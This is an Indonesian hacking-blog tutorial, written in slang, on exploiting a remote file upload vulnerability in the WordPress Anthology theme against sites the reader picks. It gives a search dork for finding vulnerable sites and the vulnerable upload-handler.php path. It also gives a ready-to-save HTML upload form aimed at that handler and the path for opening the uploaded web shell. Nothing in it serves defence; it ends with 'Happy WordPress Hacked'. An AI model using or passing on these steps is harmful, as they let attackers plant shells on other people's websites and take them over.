Di postingan kali ini Nue akan Share Tutorial Exploit WordPress Anthology Themes Remote File Upload Vulnerability *ini exploit lama sih akwwkakwa.
iseng2 aja share, kali aja masih
yupz ini adalah salah satu Bug/Celah yang ada pada theme CMS WordPress.
Lanjotz tutorial omz.
Dork:
inurl:/wp-content/themes/Anthology/
(sisanya kembangin lagi, gunakan imajinasi vokever kalian, biar bisa dpt yang vuln and verawan).
2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: target.co.li/wp-content/themes/Anthology/functions/upload-handler.php
3. Vulnerability ~ Muncul tulisan error atau Blank *kira2 sih gitu akkwakw *maap kalo salah <(")
vuln boss
Copy Script CSRF Upload nya:
<form enctype="multipart/form-data"
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />
</form>
*save dgn ekstensi .html & ubah target.co.li jadi target yang mau lo tusbol
jika sudah buka CSRF Upload nya, lalu upload deh file/shell kalian.
Jika Upload nya sukses nanti akan muncul nama file/shell kalian gengs :3
sukses gengs :v
waktunya kita buka shell/file kita, gimana caranya o.O ?
Shell Akses: target.co.li/wp-content/uploads/[year]/[month]/namashell.php
Done x_O ,, faktor muka lah :)
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
soalnya bsk masih ada Ujian Sekolah awkakwwa.
Bye..
Kunjungin juga thread saya gengs: Forum BackBox Indonesia
source and thanks to: web archive 1337days
./Nuenomaru
 |
| Topi kebelakang, Mata ku jauh Menatap KeDepan ;) |
Visit and follow :
0 komentar:
Posting Komentar